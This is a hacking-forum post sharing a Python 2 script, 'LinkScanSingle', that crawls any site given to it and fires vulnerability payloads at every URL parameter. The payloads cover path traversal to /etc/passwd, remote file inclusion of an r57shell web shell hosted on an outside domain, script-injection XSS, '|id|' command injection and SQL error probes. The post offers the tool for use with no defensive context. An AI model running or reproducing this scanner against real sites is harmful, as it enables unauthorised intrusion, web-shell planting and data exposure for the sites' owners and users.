Jump to content
Jimmy

Python vuln scanner

By Jimmy, in Programe hacking

Recommended Posts

Jimmy Newbie

Jimmy

Posted
Posted

Scaneaza dupa vuln LFI,XSS,RFI,SQL,CMD

#!/usr/bin/python

#LinkScanSingle will take a site and

#collect links from the source. If the link

#contains a = it checks LFI,XSS,RFI,SQL,CMD injection

#searching source (simple)

#If your going to use a different shell then the

#one I have supplied, you will need to change line

#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser

import sys, urllib, httplib, re, urllib2, sets, socket

socket.setdefaulttimeout(5)

class URLLister(SGMLParser):

def reset(self):

SGMLParser.reset(self)

self.urls = []

def start_a(self, attrs):

href = [v for k, v in attrs if k==href]

if href:

self.urls.extend(href)

def parse_urls(links):

urls = []

for link in links:

num = link.count("=")

if num > 0:

for x in xrange(num):

x = x+1

if link[0] == "/" or link[0] == "?":

url = site+link.rsplit("=",x)[0]+"="

else:

url = link.rsplit("=",x)[0]+"="

if url.find(site.split(".",1)[1]) == -1:

url = site+url

if url.count("//") > 1:

url = "http://"+url[7:].replace("//","/",1)

urls.append(url)

urls = list(sets.Set(urls))

return urls

def main(host):

print "\n\t[+] Testing:",host,"\n"

try:

if verbose == 1:

print "[+] Checking XSS"

xss(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] XSS Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking LFI"

lfi(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] LFI Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking RFI"

rfi(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] RFI Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking CMD"

cmd(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] CMD Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking SQL"

sql(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] SQL Error:",msg

pass

def rfi(host):

try:

source = urllib2.urlopen(host+RFI).read()

if re.search("r57shell", source):

print "[+] RFI:",host+RFI

else:

if verbose == 1:

print "[-] Not Vuln."

except(),msg:

#print "[-] Error Occurred",msg

pass

def xss(host):

source = urllib2.urlopen(host+XSS).read()

if re.search("XSS", source) != None:

print "[!] XSS:",host+XSS

else:

if verbose == 1:

print "[-] Not Vuln."

def sql(host):

for pload in SQL:

source = urllib2.urlopen(host+pload).read()

if re.search("Warning:", source) != None:

print "[!] SQL:",host+pload

else:

if verbose == 1:

print "[-] Not Vuln."

def cmd(host):

source = urllib2.urlopen(host+CMD).read()

if re.search("uid=", source) != None:

print "[!] CMD:",host+CMD

else:

if verbose == 1:

print "[-] Not Vuln."

def lfi(host):

source = urllib2.urlopen(host+LFI).read()

if re.search("root:", source) != None:

print "[!] LFI:",host+LFI

else:

if verbose == 1:

print "[-] Not Vuln."

source = urllib2.urlopen(host+LFI+"%00").read()

if re.search("root:", source) != None:

print "[!] LFI:",host+LFI+"%00"

else:

if verbose == 1:

print "[-] Not Vuln. w/ Null Byte"

print "\n\t d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"

print "\t-------------------------------------------------\n"

if len(sys.argv) not in [2,3]:

print "Usage : ./linkscan.py <site> [option]"

print "Ex: ./linkscan.py Google -verbose"

print "\n\t[Option]"

print "\t\t-verbose/-v | Verbose Output\n"

sys.exit(1)

LFI = "../../../../../../../../../../../../etc/passwd"

RFI = "http://yozurino.com/r.txt?"

RFI_TITLE = "Target"

XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

CMD = "|id|"

SQL = ["-1","999999"] #Add more or change sql payloads

site = sys.argv[1].replace("\n","")

print "\n[+] Collecting:",site

try:

if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":

verbose = 1

print "[+] Verbose Mode On\n"

except(IndexError):

print "[-] Verbose Mode Off\n"

verbose = 0

pass

site = site.replace("http://","").rsplit("/",1)[0]+"/"

site = "http://"+site.lower()

try:

usock = urllib.urlopen(site)

parser = URLLister()

parser.feed(usock.read().lower())

parser.close()

usock.close()

except(IOError, urllib2.URLError), msg:

print "[-] Error Connecting to",site

print "[-]",msg

sys.exit(1)

urls = parse_urls(parser.urls)

print "[+] Links Found:",len(urls)

for url in urls:

try:

main(url)

except(KeyboardInterrupt):

pass

print "\n[-] Done\n"

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...